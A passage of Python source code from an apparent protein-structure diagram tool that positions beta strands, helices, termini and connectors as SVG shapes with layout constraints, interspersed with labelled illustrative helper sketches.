# in ref sheet and dist of new strand from leftmost in
# new sheet
ref_strand_posnum = \
self.ptrelpos.get_strand_posnum(ref_strand)
offset = ref_strand_posnum - new_strand_posnum
offset *= get_strand_separation()
xpos = left_x + offset
SHEET_GAP_FUDGE_FACTOR = 2.5 # see FIXME just below
if relpos == RELPOS_ABOVE:
# new_sheet_height = self.get_longest_strand_length(
# self.sheet_strandlists_dict[new_element])
# ypos = top_y - new_sheet_height - \
# get_min_gap_size()
# FIXME really need to 'draw' (build) sheet first
# so we can get the height, since strand offsets
# mean it need bear no relation to the longest strand
# length, for now just something arbitrary
ypos = int(top_y - DUNNART_SHEET_GAP_SIZE * SHEET_GAP_FUDGE_FACTOR)
else:
ypos = int(bot_y + DUNNART_SHEET_GAP_SIZE * SHEET_GAP_FUDGE_FACTOR)
else:
# we are positioning sheet relative to a helix
# align the correct strand on the helix vertical axis
offset = new_strand_posnum * get_strand_separation()
xpos = left_x
if relpos == RELPOS_ABOVE:
ypos = top_y - DUNNART_SHEET_GAP_SIZE
if not new_strand.get_sideways():
ypos -= new_strand.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = bot_y + DUNNART_SHEET_GAP_SIZE
else:
assert(relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT)
ypos = top_y
if isinstance(new_element, PTNodeHelix):
assert(new_strand == None)
# positioning a helix next to a sheet or helix
if relpos == RELPOS_LEFT:
if new_element.get_sideways():
xpos = left_x - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
xpos = left_x - get_min_gap_size()
else:
xpos = right_x + get_min_gap_size()
else:
# new element is a sheet
assert(new_strand != None)
if ref_strand != None: # positioning a sheet next to a sheet
if relpos == RELPOS_LEFT:
# first compute width of new sheet
new_sheet_left_strand = \
self.sheet_strandlists_dict[new_element][0][0]
new_sheet_right_strand = \
self.sheet_strandlists_dict[new_element][-1][0]
new_sheet_width = \
len(self.sheet_strandlists_dict[new_element]) * \
(DUNNART_STRAND_WIDTH + \
get_strand_separation())
# and position it starting that far to left of ref sheet
xpos = left_x-DUNNART_SHEET_GAP_SIZE-new_sheet_width
else:
xpos = right_x + DUNNART_SHEET_GAP_SIZE
else: # positioning a sheet next to a helix
if relpos == RELPOS_LEFT:
xpos = left_x - get_min_gap_size()
else:
xpos = right_x + get_min_gap_size()
return (xpos, ypos)
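# --- Illustrative sketch (not part of the original module) ---
# A minimal, self-contained illustration of the idea used in the method above:
# turning a relative position ('above', 'below', 'left', 'right') of a
# reference bounding box into concrete (x, y) coordinates for a new element,
# leaving a minimum gap.  All names here are hypothetical, not the module's API.
def _sketch_relpos_to_xy(ref_box, relpos, new_width, new_height, min_gap=10):
    """ref_box is (left_x, right_x, top_y, bot_y); returns (xpos, ypos)."""
    left_x, right_x, top_y, bot_y = ref_box
    if relpos == 'above':
        return (left_x, top_y - min_gap - new_height)
    elif relpos == 'below':
        return (left_x, bot_y + min_gap)
    elif relpos == 'left':
        return (left_x - min_gap - new_width, top_y)
    else:  # 'right'
        return (right_x + min_gap, top_y)

# e.g. _sketch_relpos_to_xy((100, 140, 50, 200), 'below', 30, 80) == (100, 210)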
def find_nearest_to_any_in_set(self, element_set, exclude_set,
sheets_only=False):
"""
Find the nearest element (helix or sheet) to any of the elements
in the supplied set, that is not itself in this set, or in the
exclude_set. This is
so we find the nearest element to an already positioned element,
that is not itself already positioned.
Uses the PTDistMatrix to do this.
Parameters:
element_set - set of PTNodeHelixs and sheet ids to find the nearest
element to any of them, that is not itself in this set.
exclude_set - set of elements (PTNodeHelix obj or set id) to
exclude from finding (in addition to those already
in the element_set)
sheets_only - (Default False) only find sheets, not helices.
Uses data members (read):
distmatrix - The PTDistMatrix that has been built already
Return value:
tuple (set_element, close_element)
where set_element is an element in the supplied set and
close_element is the
PTNodeHelix or sheet id of the element which has minimum distance
to set_element, and this is the minimum distance between any
element in the element_set and any other element in the dist matrix.
"""
min_dist = float("inf")
min_dist_objid = None
set_element = None
# convert element (PTNodeHelix/sheet id) set to set of objids where
# the objid is the sheet id e.g. 'A' or helix id e.g. 'HELIX_A_10'
# FIXME: seems I got myself into a needless mess here with using
# string ids consistently in PTDistMatrix but mixing PTNodeHelix and
# sheet id here, necessitating this conversion; should make it
# consistent.
element_objid_set = Set()
for element in element_set:
if isinstance(element, PTNodeHelix):
objid = element.nodeid
else:
objid = element # sheet id
element_objid_set.add(objid)
for objid in element_objid_set:
(close_objid, dist) = \
self.distmatrix.get_min_distance_objid(
objid, element_objid_set.union(exclude_set), sheets_only )
if dist < min_dist:
min_dist = dist
set_element_objid = objid
min_dist_objid = close_objid
# print 'xxx',min_dist_objid,set_element_objid,dist
# TODO: this whole objid ('A' for sheet 'HELIX_A_10' for helix etc.) is
# pretty dodgy (see ptdistmatrix.py also), but as we ensure
# sheet ids and helix ids are not overlapping it works
# Should really be using classes or something.
# Also sometimes I am using (as here) my id strings as indices for
# dictionaries etc. and sometimes using actual object i.e. PTNode
# etc... not very consistent.
if len(min_dist_objid) == 1: # sheet ids are 1 char long, helix ids aren't
close_element = min_dist_objid # just the sheet id
else:
close_element = self.get_node_by_id(min_dist_objid)
if len(set_element_objid) == 1:
set_element = set_element_objid
else:
set_element = self.get_node_by_id(set_element_objid)
return (set_element, close_element)
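# --- Illustrative sketch (not part of the original module) ---
# A standalone version of the search performed above: among all elements
# already in 'placed', find the (placed, other) pair with minimum distance,
# where 'other' is not in 'placed' or 'excluded'.  'dist' here is assumed to
# be a plain {(a, b): distance} dict; the real code uses PTDistMatrix.
def _sketch_nearest_to_set(placed, excluded, all_ids, dist):
    best = (None, None, float("inf"))  # (placed_id, other_id, distance)
    for a in placed:
        for b in all_ids:
            if b in placed or b in excluded:
                continue
            d = dist.get((a, b), dist.get((b, a), float("inf")))
            if d < best[2]:
                best = (a, b, d)
    return best[0], best[1]

# e.g. with dist = {('A', 'H1'): 5.0, ('A', 'H2'): 2.0},
# _sketch_nearest_to_set({'A'}, set(), ['A', 'H1', 'H2'], dist) == ('A', 'H2')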
def aligned_strands_overlap(self, vert_list):
"""
Return True iff the strands in the vert list (i.e. strands that
are aligned on one axis) would overlap if aligned on the axis
according to their offsets relative to neighbour strands
(according to H bond patterns).
Normally this doesn't happen, and in fact one of the criteria
used to decide to put two strands on opposite sides of their common
neighbour strand (rather than the same side, see
ptnode.py has_strand_extent_overlap(), label_strand_bridge_sides())
is this very criterion. It can, however, happen sometimes when
both alternatives result in overlap and geometric (dihedral angle)
criteria are used to make the side decision. In such cases this
function returns True and we then disable the offset alignment
constraints so overlap can be resolved.
Parameters:
vert_list - list of PTNodeStrand that are aligned on an axis
Return value:
True if there would be overlap of strands if the strands are
aligned on their common axis according to their H bonds to
neighbours (offsets already set in PTNodeStrand by
build_sheet_constraints(), accessed by get_align_pos()).
"""
# Note we insist not only on no actual overlap but on a minimum
# gap of this amount (in residues, so actual position is this
# multiplied by DUNNART_SPAN_LENGTH_FACTOR), since Dunnart will
# mark an overlap constraint if they are even too close.
MIN_GAP = 1
if len(vert_list) < 2:
return False
for i in range(len(vert_list)):
for j in range(i+1, len(vert_list)):
strand1 = vert_list[i]
strand2 = vert_list[j]
if strand1.get_align_pos() < strand2.get_align_pos():
min_offset_strand = strand1
other_strand = strand2
else:
min_offset_strand = strand2
other_strand = strand1
if (min_offset_strand.get_align_pos() +
min_offset_strand.get_span() +
MIN_GAP > other_strand.get_align_pos()):
sys.stderr.write('WARNING: disabled offset constraint '
'due to overlap of strands: ' +
str(min_offset_strand) + ', ' +
str(other_strand) +
'\n')
return True
# no pair too close: strands can be aligned on their axis without overlap
return False
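# --- Illustrative sketch (not part of the original module) ---
# The overlap test above reduces to a pairwise interval check: two strands on
# the same axis clash when the lower one (by align_pos) plus its span and a
# minimum gap reaches past the start of the other.  A standalone sketch,
# representing each strand as a hypothetical (align_pos, span) tuple:
def _sketch_intervals_too_close(intervals, min_gap=1):
    for i in range(len(intervals)):
        for j in range(i + 1, len(intervals)):
            (lo_start, lo_span), (hi_start, _) = sorted([intervals[i], intervals[j]])
            if lo_start + lo_span + min_gap > hi_start:
                return True
    return False

# e.g. _sketch_intervals_too_close([(0, 5), (10, 4)]) is False,
# but _sketch_intervals_too_close([(0, 5), (5, 4)]) is True.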
def build_sheet_svg(self, sheet_pos_dict,
sse_label_scheme, seqnum_dict,
sheet_id,
xpos, ypos,
label_residue_numbers):
"""
build SVG for a sheet, with strands in left to right order
according to the constraints previously calculated, including
parallel/antiparallel relationship between strands (drawn
as up/down arrows, same direction for parallel).
Also write indguides and their alignments, and distributions.
Each strand has a vertical indguide
used to align vertically (required for multiple strands on
same vertical axis) and these are also used for the
distribution constraints (to keep uniform separation between
strands in a sheet).
Parameters:
sheet_pos_dict - (in/out)
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - 'none','sequential' or 'separate'.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
sheet_id - id of the sheet
xpos - x position to start sheet
ypos - y position to start sheet
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
ptrelpos -
PTRelativePosition instance to find relative
positions of elements
xmlid_generator
(write):
svg_constraint_list
Return value:
None
"""
start_xpos = xpos
start_ypos = ypos
horiz_order_list = self.sheet_strandlists_dict[sheet_id]
prev_vert_list = None
# NOTE: horiz/vert and x/y and height/width, top/bot
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
if horiz_order_list[0][0].get_sideways(): # if one strand is, all are
sheet_is_sideways = True
else:
sheet_is_sideways = False
# keep track of bottom and top of sheet so we can set sheet_pos_dict
if sheet_is_sideways:
top_pos = start_xpos
bot_pos = start_xpos
else:
top_pos = start_ypos
bot_pos = start_ypos
# FIXME: shouldn't use this longest_strand_length stuff anymore,
# need to take account of strand offsets etc. (see below too)
(unused_longest_strand, longest_strand_length) = \
self.ptrelpos.get_longest_strand(horiz_order_list)
longest_strand_length *= DUNNART_SPAN_LENGTH_FACTOR
distribution_xmlid = None
if len(horiz_order_list) > 1: #shouldn't get 1 strand sheets, but do
# write distribution for separation constraints between strands
# position it just below the bottom horizontal indguide of sheet
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_HORI
distr_pos = xpos + longest_strand_length + 10
else:
direction = DUNNART_GUIDE_TYPE_VERT
distr_pos = ypos + longest_strand_length + 10
xmlid = self.xmlid_generator.next()
distribution = PTSVGDistribution(xmlid, direction,
get_strand_separation(),
distr_pos)
self.svg_constraint_list.append(distribution)
strand_num = 0
for horiz_list_index in range(len(horiz_order_list)):
vert_list = horiz_order_list[horiz_list_index]
# write vertical indguide for strand(s) at this horizontal pos
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_HORI
pos = ypos
else:
direction = DUNNART_GUIDE_TYPE_VERT
pos = xpos
xmlid = self.xmlid_generator.next()
vert_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(vert_indguide)
# write a distribution constraint for this strand(s) in
# a single vertical alignment
# (relative to neighbour vertical alignment in horiz list)
# note distribution constraints are to the strands'
# corresponding vertical indguides, not strands themselves
if strand_num > 0:
self.svg_constraint_list.append(
PTSVGDistroConstraint(prev_vertlist_indguide,
vert_indguide,
distribution))
else:
# for the first strand, write a horizontal indguide to
# be used for separation constraints which enforce the
# vertical offset of subsequent strands relative to the
# first one, that was computed earlier
# (in build_sheet_constraints())
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_VERT
pos = xpos
else:
direction = DUNNART_GUIDE_TYPE_HORI
pos = ypos
xmlid = self.xmlid_generator.next()
first_horiz_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(first_horiz_indguide)
if sheet_is_sideways:
sheet_start_pos = start_ypos
else:
sheet_start_pos = start_xpos
# disable strand 'vertical' alignment offset constraints if
# there would be overlap of strand shapes on the indguide
# which would result in an unsatisfiable constraint in Dunnart
# since we also set non-overlap constraint on.
enable_offset_constraint = True
if len(vert_list) > 1 and self.aligned_strands_overlap(vert_list):
enable_offset_constraint = False
for node in vert_list:
pos = self.build_strand_svg(node,
vert_indguide,
first_horiz_indguide,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
strand_num,
sheet_start_pos,
enable_offset_constraint,
label_residue_numbers)
if pos < top_pos:
top_pos = pos
if pos + node.get_span() * DUNNART_SPAN_LENGTH_FACTOR \
> bot_pos:
bot_pos = pos + \
node.get_span() * DUNNART_SPAN_LENGTH_FACTOR
strand_num += 1
if sheet_is_sideways:
ypos += get_strand_separation()
else:
xpos += get_strand_separation()
prev_vert_list = vert_list
prev_vertlist_indguide = vert_indguide
if sheet_is_sideways:
sheet_pos_dict[sheet_id] = (start_ypos, ypos,
top_pos, bot_pos)
else:
sheet_pos_dict[sheet_id] = (top_pos, bot_pos,
start_xpos, xpos)
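# --- Illustrative sketch (not part of the original module) ---
# The constraint pattern used above, in miniature: each column of strands in a
# sheet gets its own guideline, every strand in the column is aligned to that
# guideline, and consecutive guidelines are tied together by a distribution
# constraint that keeps a uniform separation.  Shapes and constraints are just
# dicts here; the real code emits PTSVGIndGuide / PTSVGAlignmentConstraint /
# PTSVGDistroConstraint objects.
def _sketch_sheet_constraints(columns, start_x, separation):
    guides, constraints = [], []
    x = start_x
    prev_guide = None
    for column in columns:           # column is a list of strand ids
        guide = {'type': 'guideline', 'pos': x}
        guides.append(guide)
        for strand_id in column:
            constraints.append({'type': 'align', 'strand': strand_id,
                                'guide': guide})
        if prev_guide is not None:
            constraints.append({'type': 'distribute', 'from': prev_guide,
                                'to': guide, 'sep': separation})
        prev_guide = guide
        x += separation
    return guides, constraints

# e.g. _sketch_sheet_constraints([['S1'], ['S2', 'S3']], 100, 55)
# yields 2 guidelines, 3 alignment constraints and 1 distribution constraint.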
def build_strand_svg(self, node, vert_indguide,
first_horiz_indguide,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
strand_num,
sheet_start_pos,
enable_offset_align_constraint,
label_residue_numbers):
"""
Function used by build_sheet_svg() to build the SVG XML
for a single strand. This consists of the actual strand shape
along with alignment constraints.
Parameters:
node - node to write strand for
vert_indguide - vertical indguide for this strand
first_horiz_indguide - horizontal indguide
of the first strand in the sheet, which
is used as the base for all separation
constraints enforcing offset of strands
along y axis (on vert indguide)
xpos - current X position
ypos - current Y position
sse_label_scheme - 'none','sequential' or 'separate'.
if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'.
strand_num - Starts at 0 for first strand drawn in sheet.
Needed since vert alignment is relative
to first_horiz_indguide_xmlid which is for first
strand so avoid redundant indguide/align to this
on first strand only.
Also used to place the separation constraint
handles for each sheet at slightly different
positions.
sheet_start_pos - For 'sideways' sheets, y, else x position
of start of sheet (first strand).
Used for placing the separation constraint
handles for relative strand offsets.
enable_offset_align_constraint - Boolean: if True write
strand offset ('vertical' alignment constraint
(for position 'up or down' along neighbour strand)
else don't write the constraint.
label_residue_numbers - Boolean: if True put start and end
residue ids on start and end of strand shape
Uses data members:
xmlid_generator
Return value:
the ypos of the strand just written
(or xpos if sideways)
"""
assert(isinstance(node, PTNodeStrand))
# NOTE: horiz/vert and x/y and height/width
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
if sse_label_scheme == 'sequential':
label = str(seqnum_dict[node.nodeid])
elif sse_label_scheme == 'separate':
label = str(node.seqnum)
if self.num_chains() > 1:
label = label + str(node.get_chainid()).lower()
else:
label = ''
# mark 'edges' of a barrel (the strands on the ends where a bridge was broken
# to 'flatten' it) by putting an asterisk on the label
# (TODO: some better way of marking this, color or something?)
if node.get_barrel_edge():
label += '*'
strand_xmlid = self.xmlid_generator.next()
if node.get_sideways():
strand_ypos = ypos
strand_xpos = xpos + node.get_align_pos() * DUNNART_SPAN_LENGTH_FACTOR
else:
strand_xpos = xpos
strand_ypos = ypos + node.get_align_pos() * DUNNART_SPAN_LENGTH_FACTOR
node.set_svginfo(strand_xmlid, strand_xpos, strand_ypos, label,
vert_indguide,
str(seqnum_dict[node.nodeid]))
if label_residue_numbers:
node.headLabel = node.resid_list[-1]
node.tailLabel = node.resid_list[0]
# align strands in vert_list on vertical alignment indguide
if node.get_sideways():
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(vert_indguide, node, align_type))
if strand_num > 0: # not the first strand in sheet
# write an indguide for this strand to be used
# for separation constraints which enforce the position
# i.e. the align_pos
if node.get_sideways():
direction = DUNNART_GUIDE_TYPE_VERT
pos = strand_xpos
else:
direction = DUNNART_GUIDE_TYPE_HORI
pos = strand_ypos
xmlid = self.xmlid_generator.next()
this_horiz_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(this_horiz_indguide)
else:
this_horiz_indguide = first_horiz_indguide
# and align this strand on it, if parameter set to allow this
if enable_offset_align_constraint:
if node.get_sideways():
alignment_pos = DUNNART_ALIGN_LEFT
else:
alignment_pos = DUNNART_ALIGN_TOP
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(this_horiz_indguide, node,
alignment_pos))
if strand_num > 0: # not the first strand in sheet
# write separation constraint between horiz indguide of first strand
# (base for all offsets) and this horiz indguide.
sephandle_pos = sheet_start_pos - strand_num * 5
xmlid = self.xmlid_generator.next()
sep = PTSVGDistribution(
xmlid, direction,
str(node.get_align_pos()*DUNNART_SPAN_LENGTH_FACTOR),
sephandle_pos)
self.svg_constraint_list.append(sep)
self.svg_constraint_list.append(
PTSVGDistroConstraint(first_horiz_indguide,
this_horiz_indguide,
sep))
if node.get_sideways():
strand_pos = strand_xpos
else:
strand_pos = strand_ypos
return strand_pos
def set_helix_svginfo(self, helix, xpos, ypos,
sse_label_scheme,
seqnum_dict, label_residue_numbers):
"""
Set the SVG info for a helix node. called by build_dunnart_svg().
Parameters:
helix - PTSVGNodeHelix to set info in
xpos - x coordinate to write helix
ypos - y coordinate to write helix
sse_label_scheme - if 'sequential' number all SSEs sequentially
instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
include_pi_helices,include_310_helices - flag to use these or not
(NOTE: sets is_positioned flag and svg info in helix nodes though)
xmlid_generator
Return value:
None
"""
assert isinstance(helix, PTSVGNodeHelix)
if ( (helix.get_type() == "310" and not self.include_310_helices) or
(helix.get_type() == "PI" and not self.include_pi_helices) ):
return
if sse_label_scheme == 'sequential':
label = str(seqnum_dict[helix.nodeid])
elif sse_label_scheme == 'separate':
# helices are labelled 'A', 'B', etc. by convention
# FIXME: should go to AA, AB, etc. if more than 26
label = chr(ord('A')-1 + helix.seqnum)
if self.num_chains() > 1:
label = label + str(helix.get_chainid()).lower()
else:
label = ''
xmlid = self.xmlid_generator.next()
helix.set_svginfo(xmlid, xpos, ypos, label,
str(seqnum_dict[helix.nodeid]))
if label_residue_numbers:
helix.headLabel = helix.resid_list[-1]
helix.tailLabel = helix.resid_list[0]
helix.set_is_positioned(True)
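# --- Illustrative sketch (not part of the original module) ---
# One possible way to handle the FIXME above (labels past 'Z' when there are
# more than 26 helices): spreadsheet-style labels A..Z, AA, AB, ...  This is
# only a suggestion; the module itself currently stops at single letters.
def _sketch_helix_label(seqnum):
    """1 -> 'A', 26 -> 'Z', 27 -> 'AA', 28 -> 'AB', ..."""
    label = ''
    n = seqnum
    while n > 0:
        n, rem = divmod(n - 1, 26)
        label = chr(ord('A') + rem) + label
    return label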
def get_most_nterm_visible_sse(self, nodelist):
"""
Return the most N-terminal already placed SSE (helix or strand)
in the supplied nodelist (ordered from N to C terminus).
Only used when distance matrix placement is being used, depends
on the is_positioned flag in PTNode being set.
Parameters:
nodelist - list of PTNodes ordered from N- to C-terminus.
Return value:
PTNode that is most N-terminal which is already positioned
or None if none found (should not happen)
"""
i = 1 # start at second in nodelist, first is N-terminal pseudonode
while i < len(nodelist) and not nodelist[i].get_is_positioned():
i += 1
if i < len(nodelist):
return nodelist[i]
else:
return None
def get_most_cterm_visible_sse(self, nodelist):
"""
Return the most C-terminal already placed SSE (helix or strand)
in the supplied nodelist (ordered from N to C terminus).
Only used when distance matrix placement is being used, depends
on the is_positioned flag in PTNode being set.
Parameters:
nodelist - list of PTNodes ordered from N- to C-terminus.
Return value:
PTNode that is most C-terminal which is already positioned
or None if none found (should not happen)
"""
# start at second-last in nodelist, last is C-terminal pseudonode
i = len(nodelist) - 2
while i > 0 and not nodelist[i].get_is_positioned():
i -= 1
if i > 0:
return nodelist[i]
else:
return None
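# --- Illustrative sketch (not part of the original module) ---
# The two helpers above are mirror-image scans: skip the terminus pseudonode
# at each end of the chain, then walk inward until an already-positioned SSE
# is found.  A standalone sketch on plain (name, is_positioned) tuples:
def _sketch_first_positioned(nodes, from_n_terminus=True):
    indices = range(1, len(nodes) - 1)          # skip both pseudonodes
    if not from_n_terminus:
        indices = reversed(indices)
    for i in indices:
        if nodes[i][1]:
            return nodes[i][0]
    return None

# e.g. nodes = [('N', False), ('H1', False), ('S1', True), ('C', False)]
# _sketch_first_positioned(nodes) == 'S1'
# _sketch_first_positioned(nodes, from_n_terminus=False) == 'S1'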
def build_termini_svg(self, interdomain_connectors=False):
"""
Build SVG all the N- and C- terminus nodes (may be multiple for multi
chains, and 'pseudo' terminus nodes for breaks in chain due to
domain decomposition).
Parameters:
interdomain_connectors - If True, do NOT make
pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left to have connectors to the other domain
added later. Default False.
Uses data members (readonly):
chain_dict - dict of chainid : node_list
Return value:
None
"""
# since node list for each chain is sorted by PDB residue sequence
# number (ascending), the N terminal node is the first and the
# C terminal is the last.
for nodelist in self.iter_chains():
# position terminus symbol near corresponding
# most N- or C- terminal element
for term_node in [nodelist[0], nodelist[-1]]: # N-term, C-term
# build all (including pseudo) terminus nodes if not using
# interdomain connectors, and (even if we are using
# interdomain connectors), always build non-pseudo termini
if (not interdomain_connectors or not term_node.get_pseudo()):
(xpos, ypos) = self.find_terminus_pos(term_node,
nodelist)
# TODO: align on strand alignment indguide
self.set_terminus_svginfo(term_node, xpos, ypos)
def find_terminus_pos(self, term_node, nodelist):
"""
Find the position to place the supplied (N- or C-) terminus node,
by finding the nearest-in-sequence visible SSE and returning
a position nearby.
Parameters:
term_node - PTNodeTerminus to write
nodelist - list of PTNodes in this chain (containing term_node)
Return value:
(xpos, ypos) tuple to place terminus at.
"""
assert(isinstance(term_node, PTNodeTerminus))
if term_node.get_termtype() == 'N':
is_n_term = True
else:
is_n_term = False
if is_n_term:
nearest_sse = self.get_most_nterm_visible_sse(nodelist)
else: # c-term
nearest_sse = self.get_most_cterm_visible_sse(nodelist)
xpos = nearest_sse.xpos
ypos = nearest_sse.ypos
if ( (is_n_term and nearest_sse.get_reversed()) or
(not is_n_term and not nearest_sse.get_reversed()) ):
if nearest_sse.get_sideways():
xpos -= get_min_gap_size()
else:
ypos -= get_min_gap_size()
else:
if isinstance(nearest_sse, PTNodeStrand):
span_length_factor = DUNNART_SPAN_LENGTH_FACTOR
else:
span_length_factor = DUNNART_HELIX_SPAN_FACTOR
offset = nearest_sse.get_span() * span_length_factor + \
get_min_gap_size()
if nearest_sse.get_sideways():
xpos += offset
else:
ypos += offset
return (xpos, ypos)
def set_terminus_svginfo(self, terminus, xpos, ypos):
"""
Set the SVG info for an N- or C- terminus node.
Parameters:
terminus - PTNodeTerminus to write
xpos - x coordinate to write at
ypos - y coordinate to write at
Uses data members (readonly):
node_list - ordered list of nodes
xmlid_generator
Return value:
None
"""
assert isinstance(terminus, PTSVGNodeTerminus)
xmlid = self.xmlid_generator.next()
label = terminus.nodeid # 'C' or 'N' or 'Ca' etc.
terminus.set_svginfo(xmlid, xpos, ypos, label)
terminus.set_is_positioned(True)
def build_sheet_cluster_constraints_svg(self,
sheet_shading_colors):
"""
Build cluster constraints for grouping
strands into sheets. Called by build_dunnart_svg().
Parameters:
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
Uses data members (readonly):
node_list - ordered list of nodes
(write):
sheet_cluster_list - list of SVGCluster objects, appended to here.
xmlid_generator
Return value:
None
"""
num_sheets = len(list(self.sheet_dict.iteritems()))
if num_sheets < 1:
return
if (sheet_shading_colors):
cluster_fill_colors = get_cluster_fill_colors(sheet_shading_colors,
num_sheets)
i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
if (sheet_shading_colors):
cluster_fill_color = cluster_fill_colors[i]
else:
cluster_fill_color = DUNNART_DEFAULT_CLUSTER_FILL_COLOR
self.sheet_cluster_list.append(PTSVGCluster(
ptnode_list,
self.xmlid_generator.next(),
sheet_id,
0,
cluster_fill_color))
i += 1
def build_connectors_svg(self, nodelist,
chain_i,
use_connector_arrowheads=False,
connector_color_scheme = 'all',
interdomain_connectors = False):
"""
Called by build_dunnart_svg() to
build SVG for connectors for sequence in a single chain:
a connector between each
node (helix/strand) in sequence order.
This new version is for use with the -i (distance matrix instead
of heuristic helix placement) option i.e. the greedy placement
algorithm. It places connectors on ports of helices in the same
way as strands, i.e. using their orientation ('reversed' flag)
as set by tableau information.
Parameters:
nodelist - list of nodes in this chain
chain_i - chain index (0,1,...) for selecting line color
use_connector_arrowheads - If True make connectors directed.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
interdomain_connectors - If True, do NOT make
pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left to have connectors to the other domain
added later. Default False.
Uses data members (readonly):
node_list - ordered list of nodes (NB sets port fields in SVGNodes)
include_pi_helices, include_310_helices
xmlid_generator
Return value:
None
Precondition: nodelist is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
prevnode = None
for nodeindex in range(len(nodelist)):
node = nodelist[nodeindex]
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
continue # skip pi/310 helix if flagged to do so
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
continue # don't do pseudo for interdomain
if prevnode != None:
# add connector from prevnode to node
if isinstance(prevnode, PTNodeTerminus):
srcFlags = DUNNART_DEFAULT_PORT
else:
src_reversed = prevnode.get_reversed()
if src_reversed:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
if prevnode.get_sideways():
if srcFlags == DUNNART_TOP_PORT:
srcFlags = DUNNART_LEFT_PORT
else:
srcFlags = DUNNART_RIGHT_PORT
if isinstance(node, PTNodeTerminus):
dstFlags = DUNNART_DEFAULT_PORT
else:
dst_reversed = node.get_reversed()
if dst_reversed:
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
if node.get_sideways():
if dstFlags == DUNNART_TOP_PORT:
dstFlags = DUNNART_LEFT_PORT
else:
dstFlags = DUNNART_RIGHT_PORT
# line color may be overwritten later for multidomain
linecolor = get_line_color(connector_color_scheme, chain_i)
node.nterm_port = dstFlags
prevnode.cterm_port = srcFlags
xmlid = self.xmlid_generator.next()
self.svg_connector_list.append(
PTSVGConnector(xmlid, prevnode, node, srcFlags, dstFlags,
linecolor, use_connector_arrowheads))
prevnode = node
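# --- Illustrative sketch (not part of the original module) ---
# The port-selection logic above in isolation: a connector leaves the previous
# SSE at its C-terminal end and enters the next SSE at its N-terminal end, so
# the port depends on whether the shape is drawn reversed (pointing down) and
# whether it is drawn sideways.  Port names here are plain strings standing in
# for the DUNNART_*_PORT constants.
def _sketch_port(reversed_, sideways, is_source):
    # source port = C-terminal end, destination port = N-terminal end
    if is_source:
        port = 'bottom' if reversed_ else 'top'
    else:
        port = 'top' if reversed_ else 'bottom'
    if sideways:
        port = {'top': 'left', 'bottom': 'right'}[port]
    return port

# e.g. an un-reversed, upright source uses its 'top' port, and the
# un-reversed, upright destination that follows it uses its 'bottom' port.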
def dfs_strands_seq(self, start_strand, visited, dfs_list, from_node,
component_id=None):
"""
Make a depth-first search traversal of STRAND nodes
using sequence (not bridge)
edges starting at the specfied strand,
returning list of (node,from_node) tuples in DFS traversal order
where from_node is the node from which node is reached.
Note these sequence 'edges' are simply implied by the order of
nodes in list: a node has a sequence edge to the ones immediately
before and after it in sequence along chain from N to C terminus.
Parameters:
start_strand - STRAND node to start at
visited - (in/out) dictionary of {ptnode:True} visited nodes
dfs_list - (in/out) list of (node, from_node) visited in dfs order
from_node - node from which we are being (recursively) called
component_id - identifier of this connected component to mark
each strand in it with, or None to not mark at all
(default).
Recursive function. Call initially as
dfslist = []
dfs_strands_seq(startnode, {}, dfslist, None)
Return value:
None. (output is dfs_list parameter)
"""
visited[start_strand] = True
if component_id != None:
start_strand.set_seq_component_id(component_id)
dfs_list.append((start_strand,from_node))
# get list of strands (can only be max 2) adjacent in sequence
# to this one and in the same sheet
sequence_adjacent_nodes = []
chainid = start_strand.get_chainid()
sheetid = start_strand.get_sheet_id()
